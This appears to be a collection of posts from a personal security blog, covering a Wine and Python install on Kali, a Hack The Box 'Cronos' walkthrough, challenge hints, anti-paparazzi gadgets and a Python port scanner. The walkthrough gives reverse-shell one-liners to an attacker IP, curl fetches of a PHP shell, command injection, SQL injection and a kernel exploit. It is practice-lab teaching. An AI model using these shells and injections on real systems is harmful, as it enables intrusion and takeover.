How to install Wine and Python 2.7

Wine is a tool (not an emulator) for running Windows programs on non-Windows operating systems such as Linux. These are the steps to get it installed on Kali Linux together with Python 2.7.

First add the i386 architecture to your system (dpkg --add-architecture i386) in case you don't already have it; the command does nothing if it is already present. Skip this first step if that is the case.


Next run apt-get update:

apt-get update

This refreshes your package lists so you get the latest version of Wine.


Install the Wine package using apt-get install wine32. This can take a few minutes depending on your internet connection, and you will be asked to confirm the install near the start.

apt-get install wine32


Once installed you should see Wine's files in the /root/.wine folder, with a Windows C: drive structure inside it:


The next stage is to download and install Python into your Wine install. Visit the Python download page at:

https://www.python.org/downloads/release/python-2714/


and download the Windows x86 MSI Installer. The file is only 19MB, so it should download very quickly.


Now navigate to your downloads folder in the terminal and install it using wine msiexec /i python-2.7.14.msi:

wine msiexec /i python-2.7.14.msi


The install wizard should appear and unless you have some specific requirements for the install you can just hit next, next, next, finish through the windows.


Once the install is complete you can confirm it is there by navigating to the new Python folder within the Wine directory.


Hack The Box – Cronos – writeup

Cronos is a Linux box where I had a few failures before finding a method that worked to get the root password at the end. It was good practice of the "try harder" motto.

Starting with an nmap scan we can see three ports open: SSH, DNS and HTTP.


I like to check whether any default admin:admin type passwords work for SSH login to give us an easy start, but no luck.


We can then head over to the webpage and see that it looks like a default Apache install.


As the default index.html doesn't seem to be hiding any clues, I started a dirbuster scan to find any hidden files/folders, but that also comes up empty.


The DNS port we found earlier is likely there for a reason; most HTB boxes don't have it running unless it is going to help us compromise the box, so let's do some enumeration and see what we can find. An nslookup shows the subdomain ns1.cronos.htb.


It's possible that several other subdomains are in use, so let's edit the /etc/hosts file, first trying the domain cronos.htb.


If we then revisit the server in our browser it takes us to a new page. That's a good sign we're on the right track, but there are no more clues on this page, so we're likely going to have to keep digging with DNS.


We can do a zone transfer to see what other information the DNS server throws up. A few more subdomains are mentioned, and anything with "admin" in the name is always worth looking into further.


If we add this new domain to the hosts file as before and visit it we get a new login page we can try to attack.


Looking at the source code and trying some default admin:admin credentials doesn't give us anything, but moving on to testing SQL injection does.


Tricking the login page into thinking our credentials were accepted takes us to this very basic-looking page with some pre-built functions which ping and tracert a given IP.


As the famous web security saying goes, "Never trust user input". Let's see if the developer of this page took that advice and applied some sort of validation or filter to the user input.


Nope! We can run a selection of Linux commands by adding a ; after the IP address in the input box. This is the time to start looking at getting a shell back from the server. First we set up our nc listener.
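As an added illustration (not code from the box or from this post), here is the ping/tracert form's input handling written in Python: the vulnerable shape that splices user input into a shell string, beside a hardened version that accepts only a literal IP address, takes the tool from an allowlist, and passes the target as a single argv element so no shell ever parses it. The function names, the allowlist and the "traceroute" substitution for tracert are my own assumptions.

```python
#!/usr/bin/env python3
import ipaddress
import subprocess

# Assumption: the form offered ping and tracert; traceroute is the Linux
# equivalent. Only these argv prefixes can ever be launched.
ALLOWED_TOOLS = {"ping": ["ping", "-c", "1"], "tracert": ["traceroute"]}

def vulnerable_command(tool, user_input):
    """The shape that lost the box: user input spliced into a shell string.
    Run with shell=True, '127.0.0.1; echo injected' becomes two commands."""
    return " ".join(ALLOWED_TOOLS[tool]) + " " + user_input

def validate_target(user_input):
    """Accept a literal IPv4/IPv6 address only; anything else is rejected
    before it gets near a process call. Returns the normalised address."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        raise ValueError("target must be an IP address, got %r" % user_input)

def hardened_argv(tool, user_input):
    """Allowlisted tool plus the validated target as one argv element.
    Run with subprocess.run(argv): no shell is involved, so ; | && & $()
    are just characters that the validator has already refused."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError("unknown tool %r" % tool)
    return ALLOWED_TOOLS[tool] + [validate_target(user_input)]

def run_hardened(tool, user_input, timeout=5):
    """Execute the hardened form and return the process exit code."""
    argv = hardened_argv(tool, user_input)
    return subprocess.run(argv, capture_output=True, timeout=timeout).returncode

def is_accepted(tool, user_input):
    """True if the hardened path would run this request, False if rejected."""
    try:
        hardened_argv(tool, user_input)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    attempt = "127.0.0.1; echo injected"       # constructed sample input
    print("shell string the vulnerable page would run:", vulnerable_command("ping", attempt))
    print("hardened page:", "rejected" if not is_accepted("ping", attempt) else "accepted")
```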


I then tried a few one-liners such as:

  • nc -e /bin/sh 10.0.14.23 4444
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.14.23 4444 >/tmp/f
  • php -r '$sock=fsockopen("10.0.14.23",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

but they didn't work, so the next step is to see if we can get a PHP script onto the server. The one I used was the well-known pentestmonkey PHP reverse shell.


Once downloaded you need to enter your port and IP in the script and host it using the built-in Python module SimpleHTTPServer on Kali.


It can then be downloaded onto the server using this command, appended after the IP address on the web page:

curl -O http://10.10.14.23:8000/dodgyfile.php


Manually visiting the new file causes it to run and we get our shell.


A quick browse to the user folder finds the flag in the usual place.


The next step is to upgrade our shell so we can perform a few more actions during enumeration. You can spawn a proper terminal using Python:

python -c 'import pty;pty.spawn("/bin/bash");'

then navigate over to /dev/shm in preparation for getting the LinEnum.sh script onto it.


LinEnum is a well-known script which performs lots of enumeration checks on Linux systems, saving you time and removing the risk of forgetting to run something useful. It can be found at https://github.com/rebootuser/LinEnum

I downloaded it and placed it in my SimpleHTTPServer folder, then ran this on the victim machine to transfer it:

curl -O http://10.10.14.23:8000/linuxenum.sh

Note: you need to chmod +x the script before it will run.


The script provides a lot of useful information, starting with basic version info:


A few options for different shells if we need them for future attacks.


And it spots a PHP file being run with root privileges. The name of the box, Cronos, is a clue that we should be looking at something happening with a cron job.


If we look at the artisan file, it appears that this job runs the schedule method of the Laravel artisan console. The schedule method itself isn't inside the artisan file, but a search on Google eventually turns up a reference to where it might be:


We can confirm it’s there:


The Kernel.php file is writable by us, so we can add our own lines into the schedule method. If this runs as root then in theory we have pwned the system. I tried to execute a cat command to copy the contents of root.txt into a file I had access to:


This created the new root.txt file but for some reason didn't copy the contents of the original, so let's try changing the permissions instead to let us browse to it manually.


Once again the task ran but didn't work as expected. There is always more than one way to complete these challenges, so after playing with the Kernel.php file for a bit longer I went back to my enumeration and looked for other privilege escalation exploits for this version of Linux.

The first one that came up was https://www.exploit-db.com/exploits/44298

which we can download and compile using:

gcc -o file 44298.c


We can transfer it over to the victim machine using SimpleHTTPServer as before, and running it works first time to give us root access.


The flag is in the root folder.


Hints and Tips for PythonChallenge level 0

This is a page of hints for the Pythonchallenge.com level 0 challenge.

It does not contain the answer, so you can use as many hints as you want but still have to put everything together yourself to complete it.

Note: a lot of these challenges have multiple different ways of solving them, so the hints here might not match what you have found already.

Hint 1

Numbering in Python starts at 0 and goes up.

Hint 2

The URL bar is normally shown at the top of your browser. Can you manually edit it?

Hint 3

The aim is to get to the page for the next level.

Hint 4

Python has many mathematical operators.

Hint 5

A single * is for multiplication; a double ** is for something else.

Hint 6

If you think your maths has worked, try editing the URL once again.

Installing netfilterqueue in Kali

I had some trouble recently trying to install the Python library netfilterqueue onto my Kali box, as the usual pip or pip3 commands didn't seem to work.

Both Python 2 and Python 3 brought back a similar error:


Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-8l8q2wql/netfilterqueue/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-sk6qu_jn/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-install-8l8q2wql/netfilterqueue/

One way around it is to install it on a different flavour of Linux, but after a bit of trial and error I found that you can get it onto Kali from the distribution package instead:

sudo apt-get install python-netfilterqueue


This gets it onto your machine for Python 2.

Anti-Paparazzi technology part 2

The last post about anti-paparazzi clothing sent me down a rabbit hole finding out about other recent inventions designed to stop cameras. Here's a brief summary of what other options exist if you can't get hold of a nifty reflective scarf:

Flash back handbag


A student named Adam Harvey invented a handbag add-on which detects a camera flash and flashes right back at it before the photo is taken. The result is a ruined photograph. I believe the downside is that this device is only quick enough to thwart slower shutter speeds, which is good enough if you are in a dark area or out at night but won't have much of an effect at sporting events where photographers will typically be using quicker shutter speed settings. The device is also not in commercial production, but the inventor still deserves some respect for trying to beat a flash at its own game.

The inventors website

Write up at Wired.com

Write up at techcrunch.com

Anti photography paint

An article in the Express claims that any photographs taken of Angelina Jolie giving birth are fakes because the hospital she was at coated the windows with anti-photography paint. I'm a bit dubious about this claim as the article gives no further details about how it works, and Google comes up short when trying to find other examples of this technology being used elsewhere.

I think this might be a case of the journalist taking some creative liberties, and the windows of the hospital room were either coated with the same stuff as one-way mirrors (suggesting the inside was kept darker than normal) or simply had the same privacy filters applied that you can get for your office monitor to prevent shoulder surfing:


Privacy screen from 3M

Dubious article from the Express

Lasers!!!


A decade ago there were reports of technology on Roman Abramovich's new super yacht which used lasers to scan in all directions, detect the CCD (charge-coupled device) of a digital camera and blind it. The CCD is the part of the camera which detects light before encoding the information into pixels. The lasers are able to detect these and send an extra bright beam directly at the CCD, blinding it without affecting anything else.

This technology was first developed as a way to stop pirates recording movies in the cinema. There is a lot of speculation (including from the device's inventor) as to how effective it is when taken out of a small dark cinema room and stuck to the side of a giant yacht in the ocean in broad daylight.

Wired.com – Romans big yacht

techradar – review of the technology

Anti face recognition

There is some interesting work going into stopping facial recognition technology from doing its thing. This won't stop a paparazzo taking a direct photo of you, but it might hinder any automated CCTV or video recording software which activates and focuses based on what it detects as a human face.

At CV Dazzle a group of make-up artists is designing styles which stop common facial recognition technology from being able to detect a face. It works by disguising the features which some face recognition technology relies on, such as the colouring of the eyes, the nose bridge or the edges of the mouth.


The same person mentioned previously (Adam Harvey), who works on CV Dazzle and the flash-back handbag, also has a project called "Hyperface" which designs patterns that, instead of being detected as a non-face, get detected as hundreds of individual faces, hopefully confusing the facial recognition software and hiding your real face.

Looking at the sample designs, it is surprising how little is needed for software to detect a "face". A very simple arrangement of pixels which can just about pass as eyes, a nose and a mouth seems to be all it takes:


CV Dazzle – make up camouflage

Hyperface


Anti-Paparazzi clothing

This is probably a problem which doesn't affect too many readers, but if you want to avoid having your photo taken on a night out, either by a professional photographer or a snap-happy friend with an iPhone, there is a company named "Betabrand" which makes anti-paparazzi clothing that makes photos look washed out and dark.

The clothing itself contains lots of tiny glass spheres which act as a super-reflective material, bouncing back as much of the light from a flash as possible and tricking the camera into thinking the scene is a lot lighter than it really is. A lot of modern cameras will auto-adjust the picture settings and make everything darker to compensate for the mass of light they see coming in.

Its main downsides are that it doesn't work if the camera isn't using a flash or if the photographer is manually adjusting all the settings. The clothes aren't too overpriced and look cool in themselves, so it's likely that wearing them might end up attracting more attention from fans who snap a photo, notice it looks weird and suddenly get more curious about what is going on.

You can read more about it here:

PetaPixel – Watch flashback anti-paparazzi clothing ruin flash photographs

Digitalrev – How anti paparazzi clothing works

Bored Panda – Anti paparazzi clothing chris holmes

Port scanner Python script

Python port scanner – raw code with explanation

If you ever find yourself without access to Nmap, here is some quick Python code for testing the open/closed status of 1000 TCP ports on a target host. The code is explained at the bottom:

#!/usr/bin/env python3

import socket
from termcolor import colored   # third-party: pip install termcolor

# Every socket created from here on gets a 1 second timeout.
socket.setdefaulttimeout(1)

host = input("Enter the target host: ")

def portscanner(port):
    # A fresh socket per port: a socket that has already connected cannot
    # connect again, so reusing one would report every port after the
    # first open one as closed.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # connect_ex returns 0 on success, otherwise an error number.
    if sock.connect_ex((host, port)):
        print(colored("Port %d is closed" % port, 'red'))
    else:
        print(colored("Port %d is open" % port, 'green'))
    sock.close()

# Ports 1 to 1000 inclusive (range stops one short of its upper bound).
for port in range(1, 1001):
    portscanner(port)

Explanation:

import socket
from termcolor import colored

These two libraries are responsible for creating the connection to the target and for letting us add colour to the output.

socket.setdefaulttimeout(1)

Sets a 1 second timeout for every socket created afterwards, so you don't get stuck waiting for connection attempts to time out. The socket itself is created inside the function, once per port, using IPv4 (AF_INET) and TCP (SOCK_STREAM).

host = input("Enter the target host: ")

This is the prompt you see when you run the code; whatever you type is stored in the 'host' variable.

def portscanner(port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if sock.connect_ex((host, port)):
        print(colored("Port %d is closed" % port, 'red'))
    else:
        print(colored("Port %d is open" % port, 'green'))
    sock.close()

Here is the main function. A new socket is created for each port because a socket that has already connected cannot be connected again; reusing a single socket would report every port after the first open one as closed. connect_ex returns 0 on success and an error number on failure, so instead of testing for a successful connection the code looks for a failure and reports the port as closed. Anything else means the connection succeeded, so the port is reported as open.

for port in range(1, 1001):
    portscanner(port)

Sets the script to scan ports 1 to 1000 (range stops one short of its upper bound, hence 1001). You can change this to specific numbers or increase the range up to 65535.
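As an added example (not the post's own code), the same connect_ex check restructured so that a fresh socket is used for every port and the results come back as a dictionary instead of only being printed. demo_local_scan() is my own helper: it opens one listening socket and one bound-but-not-listening socket on loopback so the scanner can be exercised against a known open port and a known closed port without any target.

```python
#!/usr/bin/env python3
import socket

def probe_port(host, port, timeout=1.0):
    """True if a TCP connect to host:port succeeds within the timeout.
    A new socket is used per call: once a socket has connected (or the
    connect has failed) it cannot be handed to connect_ex again."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0   # 0 = success, else errno

def scan(host, ports, timeout=1.0):
    """Map each port number to 'open' or 'closed'."""
    return {p: ("open" if probe_port(host, p, timeout) else "closed") for p in ports}

def demo_local_scan():
    """Constructed demo on 127.0.0.1: one socket listening (open port) and one
    bound but never listening (the kernel answers with RST, so closed).
    Returns (state_of_open_port, state_of_closed_port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    reserved = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        listener.bind(("127.0.0.1", 0))   # port 0 = let the kernel pick
        listener.listen(1)
        reserved.bind(("127.0.0.1", 0))   # held, so nothing else can listen on it
        open_port = listener.getsockname()[1]
        closed_port = reserved.getsockname()[1]
        result = scan("127.0.0.1", [open_port, closed_port])
        return result[open_port], result[closed_port]
    finally:
        listener.close()
        reserved.close()

if __name__ == "__main__":
    host = input("Enter the target host: ")
    for port, state in scan(host, range(1, 1001)).items():
        if state == "open":          # quieter than the original: only open ports
            print("Port %d is open" % port)
```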